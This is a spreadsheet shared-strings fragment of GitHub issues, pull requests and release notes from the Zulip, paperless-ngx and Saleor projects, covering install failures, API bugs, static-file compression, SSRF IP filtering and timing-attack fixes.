  <si>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ce-latest-bookworm.deb. + arrow_apt_source_deb_sign=apache-arrow-apt-source-latest-bookworm.deb.asc. + curl -fLO --retry 3 https://apache.jfrog.io/artifactory/arrow/debian/apache-arrow-apt-source-latest-bookworm.deb. % Total % Received % Xferd Average Speed Time Time Time Current. Dload Upload Total Spent Left Speed. 100 65972 100 65972 0 0 62257 0 0:00:01 0:00:01 --:--:-- 62355. + curl -fLO --retry 3 https://apache.jfrog.io/artifactory/arrow/debian/apache-arrow-apt-source-latest-bookworm.deb.asc. % Total % Received % Xferd Average Speed Time Time Time Current. Dload Upload Total Spent Left Speed. 100 833 100 833 0 0 1245 0 --:--:-- --:--:-- --:--:-- 1245. + chmod 0600 /tmp/tmp.uykTbFVbWZ/zulip-server-8.4/scripts/setup/apt-repos/zulip/apache-arrow-keyring.gpg apache-arrow-apt-source-latest-bookworm.deb.asc apache-arrow-apt-source-latest-bookworm.deb. + gpgv --keyring=/tmp/tmp.uykTbFVbWZ/zulip-server-8.4/scripts/setup/apt-repos/zulip/apache-arrow-keyring.gpg apache-arrow-apt-source-latest-bookworm.deb.asc apache-arrow-apt-source-latest-bookworm.deb. gpgv: can't allocate lock for '/tmp/tmp.uykTbFVbWZ/zulip-server-8.4/scripts/setup/apt-repos/zulip/apache-arrow-keyring.gpg'. gpgv: Signature made Thu Jul 11 21:12:00 2024 UTC. gpgv: using RSA key AF6AADA4C9835B75973FF5DA275C532289DD0F4A. gpgv: Can't check signature: No public key. + remove_pgroonga_apt_tmp_dir. + rm -rf /tmp/tmp.JI2IQPTTcS. Zulip installation failed (exit code 2)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. ```. &lt;!-- Check the box for the version of Zulip you are using (see https://zulip.com/help/view-zulip-version).--&gt;. **Zulip Server and web app version:**. - [ ] Zulip Cloud (`*.zulipchat.com`). - [X] Zulip Server 8.0+. - [ ] Zulip Server 7.0+. - [ ] Zulip Server 6.0+. - [ ] Zulip Server 5.0 or older. - [ ] Other or not sure.</t>
  </si>
  <si>
    <t>static: Pre-compress with zopfli, for better compression.; Zopfli[^1] performs very good, but time-intensive, zlib compression. It is hence only suitable for pre-compressing objects, not on-the-fly compression. Use a webpack plugin to write pre-compressed versions of JS and CSS assets using Zopfli, and configure nginx to serve those assets when `Accept-Encoding: gzip` is provided. This reduces the size of the JS and CSS assets on initial pageload from 1422872 bytes to 1108267 bytes, or about a 22% savings. [^1]: https://github.com/google/zopfli. ----. This is a draft because we shouldn't ship these in release tarballs -- we should install zopfli and compress them on the server before installation into `~zulip/prod-static/`.</t>
  </si>
  <si>
    <t>che-Status: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t>
  </si>
  <si>
    <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https://paperless-ngx.oelkuch-sh.de/accounts/l</t>
  </si>
  <si>
    <t>Bugfix: Configure scheduled tasks to expire after some time; &lt;!--. Note: All PRs with code changes should be targeted to the `dev` branch, pure documentation changes can target `main`. --&gt;. ## Proposed change. This configures the scheduled tasks to expire based on the default timing. This means if the worker goes away for some reason, it won't come back to a deluge of waiting tasks, all of which are doing the same thing. I chose to expire tasks based on the default scheduling, but an argument could also be made to default all these to the same timeout. Basically, if the task isn't run in x minutes, no matter which scheduled task, expire it. I looked into rate limits as well, but it's cumbersome to apply them and not very flexible. . This doesn't change consume tasks, those will never expire and shouldn't ever be configured to do so. Fixes #2604. ## Type of change. &lt;!--. What type of change does your PR introduce to Paperless-ngx? NOTE: Please check only one box! --&gt;. - [x] Bug fix (non-breaking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t>
  </si>
  <si>
    <t>[BUG] Fails to consume file: Device or resource busy; ### Description. When the scanner saves directly to the paperless "consume" folder, and it takes too long to finish saving the file, paperless fails to consume it, complaining the device or resource is busy. This issue is a follow-up of #432 and of https://github.com/jonaswinkler/paperless-ng/issues/1406. Essentially, the initial conditions to trigger the bug are still the same. Even though paperless-ngx has some extra logic to make this bug more rare, it still happens. Ideas for solutions:. * Instead of retrying the file every X seconds, paperless could use [exponential backoff](https://en.wikipedia.org/wiki/Exponential_backoff). So, initially it would retry after a few seconds. If still failing, the interval between each retry gets longer and longer (up to some hard limit, let's say, 1 or 2 or 5 minutes). * Better configuration defaults. With the exponential backoff implemented, the amount of retries and/or the time limit for the retries could be set to some high-enough value so that this bug shouldn't happen anymore under normal cases. After all, if a file is still busy/failing after 10~30 minutes of retrying, it certainly means there is something wrong, as this is abnormal, and thus a failure is a good idea. But for all other "normal" cases, the issue will fix itself after a few minutes, and thus the UX is that the document will be consumed and no troubleshooting will be needed. * In this case the current `PAPERLESS_CONSUMER_POLLING_DELAY` (5 seconds by default) configuration can be obsoleted, as the actual delay will be dynamically calculated based on the backoff algorithm. * Also, `PAPERLESS_CONSUMER_POLLING_RETRY_COUNT` (5 retries by default) should also be obsoleted, and replaced by something like `PAPERLESS_CONSUMER_RETRY_TIMEOUT` (set to 15 or 30 minutes by default). * Provide some way for the user to re-submit a document that failed processing. * It could be some UI. * It could be a link to some instru</t>
  </si>
  <si>
    <t>n/Rechnung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t>
  </si>
  <si>
    <t>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nosniff. ref</t>
  </si>
  <si>
    <t>Feature: Add ahead of time compression of the static files for x86_64; &lt;!--. Note: All PRs with code changes should be targeted to the `dev` branch, pure documentation changes can target `main`. --&gt;. ## Proposed change. This PR adds compression of the static files, using whitenoise. The static files are compressed once, on x86_64, then used throughout. I considered making it more configurable, but then I think it would be easy for a user to change this and not run `collectstatic`, leaving them with no or wrong static files in place. Or a "release" vs "development" build, but that proved to become complicated quickly. . Perhaps in the future GitHub will have native arm64 runners, which would allow this to be revisited and simplified. Some improvements to whitenoise could be built in as well. In some testing, this reduced main.js to about 50% size when using gzip and to about 40% size when using Brotli (requires HTTPs). ## Type of change. &lt;!--. What type of change does your PR introduce to Paperless-ngx? NOTE: Please check only one box! --&gt;. - [ ] Bug fix (non-breaking change which fixes an issue). - [x] New feature (non-breaking change which adds functionality). - [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected). - [ ] Other (please explain):. ## Checklist:. &lt;!--. NOTE: PRs that do not address the following will not be merged, please do not skip any relevant items. --&gt;. - [x] I have read &amp; agree with the [contributing guidelines](https://github.com/paperless-ngx/paperless-ngx/blob/main/CONTRIBUTING.md). - [x] If applicable, I have included testing coverage for new code in this PR, for [backend](https://docs.paperless-ngx.com/development/#testing) and / or [front-end](https://docs.paperless-ngx.com/development/#testing-and-code-style) changes. - [x] If applicable, I have tested my code for new features &amp; regressions on both mobile &amp; desktop devices, using the latest version of major browsers. - [x] If applicable, I h</t>
  </si>
  <si>
    <t>est in paperless-ngx.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t>
  </si>
  <si>
    <t>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 */*. Ac</t>
  </si>
  <si>
    <t>[BUG] 2.0 `CSRF verification failed`, docker+ reverse proxy(caddy with Cloudflare) doesn't work; ### Description. I use the latest image: [2.0](https://hub.docker.com/r/paperlessngx/paperless-ngx). ## the environment is:. - docker compose. - [Caddy with Cloudflare module](https://caddyserver.com/download?package=github.com%2Fcaddy-dns%2Fcloudflare). ## The caddy file. ```. paperless.mydomain.com {. tls {. dns cloudflare APIkeyhidden. }. encode gzip. reverse_proxy localhost:8000. }. ```. ## Docker compose config. ### here is the docker-compose.yml. ```yml. # docker-compose file for running paperless from the Docker Hub. # This file contains everything paperless needs to run. # Paperless supports amd64, arm and arm64 hardware. #. # All compose files of paperless configure paperless in the following way:. #. # - Paperless is (re)started on system boot, if it was running before shutdown. # - Docker volumes for storing data are managed by Docker. # - Folders for importing and exporting files are created in the same directory. # as this file and mounted to the correct folders inside the container. # - Paperless listens on port 8000. #. # In addition to that, this docker-compose file adds the following optional. # configurations:. #. # - Instead of SQLite (default), PostgreSQL is used as the database server. #. # To install and update paperless with this file, do the following:. #. # - Copy this file as 'docker-compose.yml' and the files 'docker-compose.env'. # and '.env' into a folder. # - Run 'docker-compose pull'. # - Run 'docker-compose run --rm webserver createsuperuser' to create a user. # - Run 'docker-compose up -d'. #. # For more extensive installation and update instructions, refer to the. # documentation. version: "3.4". services:. broker:. image: docker.io/library/redis:7. restart: unless-stopped. volumes:. - ./redisdata:/data. db:. image: docker.io/library/postgres:15. restart: unless-stopped. volumes:. - ./pgdata:/var/lib/postgresql/data. environment:. POSTGR</t>
  </si>
  <si>
    <t>[BUG] Version check running into Github rate limit; ### Description. Ever since the version checker was implemented it never told me any new version. So i started digging into this. Currently my paperless-ngx (2.4.3) reports in the logs:. ```. [2024-02-05 10:07:46,730] [DEBUG] [paperless.api] An error occurred checking for available updates. ```. Debugging this it turns out that if i call natively to the [API](https://api.github.com/repos/paperless-ngx/paperless-ngx/releases/latest) of Github i'm running into a rate limit. Which makes sense since i do have DSLite on my connection and my providers offers one IPv4 IP for many clients. ```. {"message":"API rate limit exceeded for 92.XXX.XXX.XXX. (But here's the good news: Authenticated requests get a higher rate limit. Check out the documentation for more details.)","documentation_url":"https://docs.github.com/rest/overview/resources-in-the-rest-api#rate-limiting"}. ```. Would it be possible to add authentication for this? ### Steps to reproduce. - Exceed your rate limit on Github API. ### Webserver logs. ```bash. [2024-02-05 10:07:46,730] [DEBUG] [paperless.api] An error occurred checking for available updates. ```. ### Browser logs. _No response_. ### Paperless-ngx version. 2.4.3. ### Host OS. Official Image of Paperless. ### Installation method. Docker - official image. ### Browser. _No response_. ### Configuration changes. _No response_. ### Other. Maybe it would be possible to simply pass an authentication token into the config. Then the call to the API would just need an additional header like this:. ```. Authorization: token my_access_token. ```. !Untested - based of a quick research on how to build that! ### Please confirm the following. - [X] I believe this issue is a bug that affects all users of Paperless-ngx, not something specific to my installation. - [X] I have already searched for relevant existing issues and discussions before opening this report. - [X] I have updated the title field above with a conci</t>
  </si>
  <si>
    <t>/local/lib/python3.11/site-packages/rest_framework/renderers.py",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t>
  </si>
  <si>
    <t>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 not so</t>
  </si>
  <si>
    <t>avoid polling</t>
  </si>
  <si>
    <t>[BUG] Documents not consumed if a folder containing documents is moved to consume directory; ### Description. Paperless consumes documents directly placed into the consumption folder as expected, but when a folder containing documents is placed inside the consumption directory, the documents are not consumed. I have PAPERLESS_CONSUMER_RECURSIVE and PAPERLESS_CONSUMER_SUBDIRS_AS_TAGS turned on. If I first replicate the (empty) folder structure in the consumption directory and then add documents to this structure, they get consumed and tagged correctly. If I use PAPERLESS_CONSUMER_POLLING the documents also get consumed, but I would like to avoid polling. ### Steps to reproduce. 1. Outside of (empty) consumption directory put document in new folder. 2. Move or copy this folder into consumption directory. ### Webserver logs. ```bash. # Adding test.txt directly to consumption directory:. 2024-02-24 11:00:44.910850+01:00[2024-02-24 11:00:44,909] [INFO] [paperless.management.consumer] Adding /usr/src/paperless/consume/test.txt to the task queue. 2024-02-24 11:00:44.933221+01:00[2024-02-24 11:00:44,932] [INFO] [celery.worker.strategy] Task documents.tasks.consume_file[ddff4b0f-682f-4191-abd4-51774c49e603] received. 2024-02-24 11:00:44.951354+01:00[2024-02-24 11:00:44,950] [INFO] [paperless.tasks] WorkflowTriggerPlugin completed with no message. 2024-02-24 11:00:44.958844+01:00[2024-02-24 11:00:44,958] [INFO] [paperless.consumer] Consuming test.txt. 2024-02-24 11:00:45.116297+01:00[2024-02-24 11:00:45,115] [INFO] [paperless.consumer] Document 2024-02-24 test consumption finished. 2024-02-24 11:00:45.125068+01:00[2024-02-24 11:00:45,124] [INFO] [celery.app.trace] Task documents.tasks.consume_file[ddff4b0f-682f-4191-abd4-51774c49e603] succeeded in 0.19009054399793968s: 'Success. New document id 171 created'. # Adding folder testfolder with test2.txt inside to consumption directory yields no reaction in the log. # Removing and immediately re-adding test2.txt from /usr/src/pape</t>
  </si>
  <si>
    <t>:34:30,650]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t>
  </si>
  <si>
    <t xml:space="preserve">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"allow",. </t>
  </si>
  <si>
    <t>[BUG] Uploading a document using REST API results in error 500 about remove_inbox_tags; ### Description. When uploading a document using the REST API, an error 500 is thrown and the logs contain a message about a Django serializer trying to pass `remove_inbox_tags` to the model layer, where the field is not allowed. The POST body is a multipart form data with the following contents, the PDF file is truncated:. ```. Host: paperless.xxx.nl. Accept-Encoding: gzip, deflate. Connection: keep-alive. User-Agent: python-httpx/0.27.0. Authorization: Token xxx. Accept: application/json; version=4. Content-Length: 153606. Content-Type: multipart/form-data; boundary=6d6916394b172f9cdadd8b60748ea613. --6d6916394b172f9cdadd8b60748ea613. Content-Disposition: form-data; name="title". 40 - Originele factuur - xxx.pdf. --6d6916394b172f9cdadd8b60748ea613. Content-Disposition: form-data; name="created". 2021-10-30T20:15:05.234987Z. --6d6916394b172f9cdadd8b60748ea613. Content-Disposition: form-data; name="storage_path". --6d6916394b172f9cdadd8b60748ea613. Content-Disposition: form-data; name="document_type". 1. --6d6916394b172f9cdadd8b60748ea613. Content-Disposition: form-data; name="correspondent". 28. --6d6916394b172f9cdadd8b60748ea613. Content-Disposition: form-data; name="tags". 13. --6d6916394b172f9cdadd8b60748ea613. Content-Disposition: form-data; name="custom_fields". 2. --6d6916394b172f9cdadd8b60748ea613. Content-Disposition: form-data; name="custom_fields". 1. --6d6916394b172f9cdadd8b60748ea613. Content-Disposition: form-data; name="document"; filename="40 - Originele factuur - xxx.pdf". Content-Type: application/pdf. %PDF-1.4. ```. ### Steps to reproduce. This is the most minimal case I can reproduce the error with, substitute a PDF file, a token and an API endpoint:. ```. $ curl -XPOST -H "Authorization: Token xxx" -H "Accept: application/json; version=4" -F title=foo -F correspondent= -F document_type= -F storage_path= -F document=@/tmp/xxx.pdf https://paperless.xxx.nl/api/d</t>
  </si>
  <si>
    <t>aperless-ngx/blob/9885ca5103af8682780c22b421192421171d78b0/src/paperless/settings.py)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t>
  </si>
  <si>
    <t>-ngx/blob/9885ca5103af8682780c22b421192421171d78b0/src/paperless/settings.py)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 conten</t>
  </si>
  <si>
    <t>r X-Forwarded-Proto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t>
  </si>
  <si>
    <t>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[2024-04-25 17:</t>
  </si>
  <si>
    <t>bridges/GitHub/commander-api/node_modules/axios/lib/core/Axios.js:45:41)\n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t>
  </si>
  <si>
    <t xml:space="preserve">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 following. - [X] </t>
  </si>
  <si>
    <t>e multiples files for each language that are repeated, while they are the same (identical hashes), and they are not symlinks. All the languages contains an `assets/js/` directory of 1.8M size with this data : . ```. 376K pdf.min.mjs. 1.4M pdf.worker.min.mjs. ```. The size by itself is not much, but being duplicated for the 30+ languages make it suddenly more important, for a total of 57M for those 2 files. A quick check with find and shasum will confirm all of theses files are identical (cf **steps to reproduce**). There is also the same situation under `/usr/src/paperless/static/frontend/*/assets/js/`. A lot of symlinks are present here, but not for the following files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t>
  </si>
  <si>
    <t>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under `/usr/src/paperless/static/frontend/` linking to its tmpl counterpart under `/usr/src/paperless/src/documents/static/frontend/` . It would be much easier to maintain as both directories share only a part of the same content. ### Steps to reproduce. Open a prompt in the paperless-ngx's docker image. ```. # -type f will filter out any links. $ find /usr/src/paperless/src/documents/static/frontend -type f -iname "pdf*.min.mjs" -exec shasum "{}" \;. bfbbfcd8acb15959d20a14251efa33e93db8482f /usr/src/paperless/src/documents/static/frontend/es-ES/assets/js/pdf.worker.min.mjs. 36019a6c68f55a241bca0ddc2bda27db7cee6d1d /usr/src/paperless/src/documents/static/frontend/es-E</t>
  </si>
  <si>
    <t>cription.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t>
  </si>
  <si>
    <t xml:space="preserve">.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version. </t>
  </si>
  <si>
    <t xml:space="preserve">Fix: fix potential race condition when creating new cf from doc details; …doc details. &lt;!--. Note: All PRs with code changes should be targeted to the `dev` branch, pure documentation changes can target `main`. --&gt;. ## Proposed change. Lol, well despite the original user saying it's solved by changing the URL I think there's a race condition here that can only be reproduced with a slow connection. Regardless, this is a safe change. Basically if the fields refresh takes longer than the time before it gets added it currently will fail, but we dont need the `getCustomFieldFromInstance` call at all, we already have the field id. OP doesn't seem to be able to test but I can repro with chromium throttling:. Before:. https://github.com/user-attachments/assets/a9ff31d3-71c6-46e9-adee-f230625f3aac. After:. https://github.com/user-attachments/assets/a68309a2-d95f-4e34-8830-61e62172829a. Closes #9505 (I mean, probably). ## Type of change. &lt;!--. What type of change does your PR introduce to Paperless-ngx? NOTE: Please check only one box! --&gt;. - [x] Bug fix: non-breaking change which fixes an issue. - [ ] New feature / Enhancement: non-breaking change which adds functionality. _Please read the important note above._. - [ ] Breaking change: fix or feature that would cause existing functionality to not work as expected. - [ ] Documentation only. - [ ] Other. Please explain:. ## Checklist:. &lt;!--. NOTE: PRs that do not address the following will not be merged, please do not skip any relevant items. --&gt;. - [ ] I have read &amp; agree with the [contributing guidelines](https://github.com/paperless-ngx/paperless-ngx/blob/main/CONTRIBUTING.md). - [ ] If applicable, I have included testing coverage for new code in this PR, for [backend](https://docs.paperless-ngx.com/development/#testing) and / or [front-end](https://docs.paperless-ngx.com/development/#testing-and-code-style) changes. - [ ] If applicable, I have tested my code for new features &amp; regressions on both mobile &amp; desktop devices, </t>
  </si>
  <si>
    <t>NFIG_PHASE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t>
  </si>
  <si>
    <t>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SESSION_COOKIE_DOMA</t>
  </si>
  <si>
    <t>IZ_CONFIG_PROFILE\':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t>
  </si>
  <si>
    <t>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\'rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41</t>
  </si>
  <si>
    <t>Get rid of grunt, use webpack for everything; Here's the result of me having a free evening. - Grunt is no more. - JSX files now have a regular `.js` extension. - All file names are hashed by webpack, we no longer need a custom storage backend. - Font files are automatically extracted, no need to copy them anywhere. - All npm dependencies are now listed as dependencies, devDependencies are meant for linters and such. - All generated files are written under `saleor/static/assets/`. The structure is flat as the files are not meant for humans. - Cart page has its own bundle. - Third-party libraries have their own JS bundle. Resulting site loads faster (tested with severe network throttling) and returning customers don't need to re-download jQuery each time our code changes. - Templates use `django-webpack-loader` to insert links to assets. - `webpack-bundle.json` file is needed by the above and should be deployed with the backend code. - We now use a standard Heroku node.js buildpack. - Rebuilds are triggered with `npm run build-assets`. - Watch mode can be triggered using `npm run watch`. A lot of code was removed. Total delta is positive only because of the shrinkwrap file for npm. Todo:. - [x] Verify that source maps work. - [x] Make sure docs don't lie. - [x] Verify that Heroku works. - [x] Double-check that Docker works (I use Docker locally but it would be nice of someone could verify). - [x] Check if S3 works. We should get rid of the custom storage backend first. Future work:. - Move source JS, SCSS and font files outside of the static file tree so they don't end up getting uploaded to a CDN during deployment.</t>
  </si>
  <si>
    <t>Cannot place order in saleor demo's storefront; ### What I'm trying to achieve. Place an order on the demo store to reproduce another bug. :wink:. ### Steps to reproduce the problem. 1. Create a cart with an item;. 2. Follow the checkout until the summary page;. 3. Try to hit "Order &amp; Pay";. 4. A server error should occur. **System information**. ```. Host: demo.getsaleor.com. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0. Accept-Language: en,en-GB;q=0.8,en-US. Accept-Encoding: gzip, deflate, br. Referer: https://demo.getsaleor.com/en/checkout/summary/. ```</t>
  </si>
  <si>
    <t>Dashboard 2.0: cannot add products; ### Steps to reproduce the problem. 1. Go to products;. 2. Click on "+";. 3. It should fail to load the view and crash. ### Request and response. ```. POST /graphql/ HTTP/1.1. Host: 127.0.0.1:8000. Connection: keep-alive. Content-Length: 2293. Origin: http://127.0.0.1:8000. content-type: application/json. accept: */*. User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36. Referer: http://127.0.0.1:8000/dashboard/next/products/add/. Accept-Encoding: gzip, deflate, br. Accept-Language: en-US,en;q=0.9. HTTP/1.1 200 OK. Date: Thu, 09 Aug 2018 11:06:27 GMT. Server: WSGIServer/0.2 CPython/3.6.6. Content-Type: application/json. Vary: Cookie, Accept-Language. Content-Language: en. Content-Length: 305. {"errors":[{"message":"Could not resolve to a node with the global id of 'add'.","locations":[{"line":141,"column":3}],"path":["product"]}],"data":{"product":null,"collections":{"edges":[],"__typename":"CollectionCountableConnection"},"categories":{"edges":[],"__typename":"CategoryCountableConnection"}}}. ```</t>
  </si>
  <si>
    <t>SSR</t>
  </si>
  <si>
    <t>Update react-dom; Fixes the spurious CVE warning from Snyk (we are not affected as we do not use react-dom in SSR).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The changes are tested. 1. [x] The code is documented (docstrings, project documentation). 1. [x] GraphQL schema and type definitions are up to date.</t>
  </si>
  <si>
    <t>AttributeError: 'NoneType' object has no attribute 'content_type; ### What I'm trying to achieve. I'm trying to upload product image via graphql API using curl . ### Steps to reproduce the problem. 1. Have an image in a folder and run this curl in this folder. `curl --request POST \ . --url http://localhost:8000/graphql/ \. --header 'accept: application/json' \. --header 'accept-encoding: gzip, deflate, br' \. --header 'connection: keep-alive' \. --header 'dnt: 1' \. --header 'Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImFkbWluQGV4YW1wbGUuY29tIiwiZXhwIjoxNTY0MTU2MTY5LCJvcmlnSWF0IjoxNTY0MTU1ODY5fQ.vo1fBFz9OaANBLL-oqJCs-x5eQTOZUIUQyVoAZyuvCE' \. --header 'origin: http://localhost:8000/graphql/' \. --form 'operations={"query": "mutation createProductImage($image: Upload!, $product: ID!) {productImageCreate(input: {image: $image, product: $product}) {image {id}}}", "variables": {"product": "UHJvZHVjdDo3Mw==", "image": "picture.jpg"}}' \. --form 'map={ "nFile": ["variables.file"] }' \. --form nFile=@picture.jpg . `. ### What I expected to happen. File to be uploaded for a product, instead I get. `{"errors": [{"message": "'NoneType' object has no attribute 'content_type'", "locations": [{"line": 1, "column": 62}], "path": ["productImageCreate"], "extensions": {"exception": {"code": "AttributeError", "stacktrace ": ["Traceback (most recent call last):", " File \"/usr/local/lib/python3.7/site-packages/promise/promise.py\", line 487, in _resolve_from_executor", " executor(resolve, reject)", " File \"/usr/local/lib/python3.7/site-packages/promise/promise.py\", line 754, in executor", " return resolve(f(*args, **kwargs))", " File \"/usr/local/lib/python3.7/site-packages/graphql/execution/middleware.py\", line 75, in make_it_promise", " return next(*args, **kwargs)", " File \"/app/saleor/graphql/core/mutations.py\", line 207, in mutate", " response = cls.perform_mutation(root, info, **data)", " File \"/app/saleor/graphql/product/mutations/products.py\",</t>
  </si>
  <si>
    <t>ering products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t>
  </si>
  <si>
    <t>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}\n}\n","variables":{</t>
  </si>
  <si>
    <t>Throttling</t>
  </si>
  <si>
    <t>Throttling email on requestPasswordReset mutation; ### What I'm trying to achieve. Restrict email sending. ### Describe a proposed solution. Set a timeout for sending email. . For example, when user send ```requestPasswordReset``` mutation, do not allow the user to resend within 3 minutes. ### Other solutions I've tried and won't work. …. ### Screenshots or mockups. ```mutation {. requestPasswordReset(. channel: "default-channel". email: "email@email.com". redirectUrl: "http://localhost:8000/". ) {. errors {. field. message. code. addressType. }. }. }```.</t>
  </si>
  <si>
    <t>Add native gzip support to the core; The code is based on Starlette's middleware but does not use any external convenience wrappers. Starlette's middleware is incompatible with Django as Django uses case-sensitive headers in ASGI messages.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</si>
  <si>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reduce API calls</t>
  </si>
  <si>
    <t>Complete bulk order create; RFC: https://github.com/saleor/saleor/issues/11870. I want to merge this change, because this PR add missing logic to https://github.com/saleor/saleor/pull/12269. The PR includes:. - process discounts. - process vouchers. - process gift cards. - process order.number. - reduce API calls by collecting all models keys from input and retrieving all instances at once. - add missing validations. - add OrderBulkCreated event. - simplify code. - replace `OrderBulkCreateError.field` with `path`.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</si>
  <si>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Add semgrep rules for IP filter feature; This adds semgrep rules for the newly added IP filter feature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t>
  </si>
  <si>
    <t>HTTP_IP_FILTER_ALLOW_LOOPBACK_IPS to support whole IANA Private Internets adresses range; &lt;https://docs.saleor.io/docs/3.x/setup/configuration#http_ip_filter_allow_loopback_ips&gt;. &gt; HTTP_IP_FILTER_ALLOW_LOOPBACK_IPS. &gt; . &gt; Added in v3.16. &gt; . &gt; When set to False (default), the HTTP IP filter will reject loopback IP addresses (127.0.0.0 to 127.255.255.255 range). Docker networks map processes in my case to 192.168/16, meaning I have to disable the whole IP filter to install apps through docker-compose networks. trying to do install an app via dashboard like https://admin.site.lan/apps/install?manifestUrl=http://app-emails:3000/api/manifest , saleor gives error. ```bash. api-1 | {"asctime": "2024-03-25T22:34:37Z", "levelname": "WARNING", "lineno": 50, "message": "Forbidden IP address: 192.168.240.8 for hostname app-emails", "name": "requests_hardened.ip_filter", "pathname": "/usr/local/lib/python3.9/site-packages/requests_hardened/ip_filter.py", "process": 25, "threadName": "ThreadPoolExecutor-0_0", "dst_ip": "192.168.240.8", "dst_hostname": "app-emails", "hostname": "55c20782809b"}. ```. where it complains about that 192.168.240.8 not being allowed as loopback filter. Thus, I think to allow locally running apps to work with Saleor directly instead of having to go through DNS, Saleor could support [IANA Address Allocation for Private Internets](https://www.rfc-editor.org/rfc/rfc1918.html). Though, if this env allows all 3 of these, I don't know what benefit HTTP_IP_FILTER_ENABLED will have, as it's point is to block [SSRF attacks](https://cwe.mitre.org/data/definitions/918.html)? I'm unsure about if this even makes sense from a security standpoint, I just assume HTTP_IP_FILTER_ALLOW_LOOPBACK_IPS exists so localhost services can talk with Saleor.</t>
  </si>
  <si>
    <t>+] FIREBASE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t>
  </si>
  <si>
    <t>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***REDACTED***[PID:2402:ThreadPoolEx</t>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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Adjust time execution in account related mutations; Introduce good practice to remove different time execution in account related mutations depending if user exists etc. to prevent timing attacks. Benchmarks done on local machine with 10 attempts for each case and calculated the mean. We are expecting to see similar timing in column `after` for different cases with existing emails and usage of wrong/correct password. RequestPasswordReset mutation:. | Case | Before | After |. | - | - | - |. | email exists | 112ms | 54ms |. | email exists - hit the reset password limit | 29ms | 55ms |. | email doesn't exists | 24ms | 54ms | . CreateToken mutation (note: You can run into throttling mechanism while performing similar tests for the last two cases. They were excluded from calculating mean of the tests (reattempted the time measurement) as it's expected to get faster execution time when hitting limit for failed login attempts) :. | Case | Before | After |. | - | - | - |. | email exists correct password | 213ms | 209ms |. | email exists incorrect password | 203ms | 204ms |. | email doesn't exists | 24ms | 206ms |. AccountRegister mutation:. | Case | Before | After |. | - | - | - |. | email exists | 43ms | 228ms |. | email doesn't exists | 257ms | 234ms |. And mutations that weren't changed in this PR. SetPassword mutation:. | Case | Before | After |. | - | - | - |. | email exists | 23ms | 20ms |. | email doesn't exists | 21ms | 22ms |. ConfirmAccount mutation:. | Case | Before | After |. | - | - | - |. | email exists | 23ms | 26ms |. | email doesn't exists | 25ms | 24ms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t>
  </si>
  <si>
    <t>Remove reference cycle in gzip; I want to merge this change because it allows memory to be freed immediately without needing a deep garbage collection cycle. Fix for: https://github.com/python/cpython/issues/129640. Garbage before:. ![garbage_before](https://github.com/user-attachments/assets/53f43dec-43bd-4ff3-bd94-0a48ccf5860b). Garbage after is empty:. ![garbage_after](https://github.com/user-attachments/assets/ed7b5776-b77f-4643-b5bd-7414f077dbf0).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</si>
  <si>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3.20.69; * Fix checkout order line creation in case of empty `ProductTranslation` by @IKarbowiak in #17319. * Update test_create_transaction_event_message_limit_exceeded by @IKarbowiak in #17060. * Remove reference cycle in gzip by @fowczarek in #17318. * Adjust order fulfillment by @IKarbowiak in #17300 . * Move source-service-name from http to GraphQL span by @fowczarek in #17316. * Remove reference cycle in Django DB by @fowczarek in #17313. * Remove reference cycle in Saleor context by @fowczarek in #17309. * Fix incorrect order for reordering collection products when sort_order is null by @korycins #17283.</t>
  </si>
  <si>
    <t>Remove reference cycle in Gzip; Port #17564. I want to merge this change because it allows memory to be freed immediately without needing a deep garbage collection cycle. Fix for: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</si>
  <si>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</si>
  <si>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</si>
  <si>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3.20.83; * Fix race condition in AccountRegister mutation - #17634 by @korycins . * Fix order.totalRefunded for fully-refunded payments - #17633 by @korycins . * Fix PromotionRule giftIds resolver - #17631 by @IKarbowiak . * Drop patch for reference cycles in Gzip - #17611 by @fowczarek . * Fix incorrect call of pluginsManager - #17599 by @korycins . * Fix PositiveDecimal scalar - #17596 by @lkostrowski .</t>
  </si>
  <si>
    <t>## What's Changed. * Fix PositiveDecimal scalar (3.20) by @lkostrowski in https://github.com/saleor/saleor/pull/17596. * Fix incorrect call of PluginsManager.get_tax_code_from_object_meta by @korycins in https://github.com/saleor/saleor/pull/17599. * Drop patch for reference cycles in Gzip by @fowczarek in https://github.com/saleor/saleor/pull/17611. * Fix `PromotionRule.giftIds` resolver by @IKarbowiak in https://github.com/saleor/saleor/pull/17631. * Fixes an issue where totalRefund was incorrect for fully refunded payments. by @korycins in https://github.com/saleor/saleor/pull/17633. * Fix a potential race condition when creating a new user instance via the AccountRegister mutation by @korycins in https://github.com/saleor/saleor/pull/17634. * Release 3.20.83 by @IKarbowiak in https://github.com/saleor/saleor/pull/17666. **Full Changelog**: https://github.com/saleor/saleor/compare/3.20.82...3.20.83</t>
  </si>
  <si>
    <t>release</t>
  </si>
  <si>
    <t>## What's Changed. * Fix incorrect order for reordering collection products when sort_order is null by @korycins in https://github.com/saleor/saleor/pull/17283. * Remove reference cycle in Saleor context by @fowczarek in https://github.com/saleor/saleor/pull/17309. * Remove reference cycle in Django DB by @fowczarek in https://github.com/saleor/saleor/pull/17313. * Move source-service-name from HTTP to GraphQL span by @fowczarek in https://github.com/saleor/saleor/pull/17316. * Adjust order fulfillment by @IKarbowiak in https://github.com/saleor/saleor/pull/17300. * Remove reference cycle in gzip by @fowczarek in https://github.com/saleor/saleor/pull/17318. * Update test_create_transaction_event_message_limit_exceeded by @IKarbowiak in https://github.com/saleor/saleor/pull/17060. * Fix checkout order line creation in case of empty `ProductTranslation` by @IKarbowiak in https://github.com/saleor/saleor/pull/17319. **Full Changelog**: https://github.com/saleor/saleor/compare/3.20.68...3.20.69</t>
  </si>
  <si>
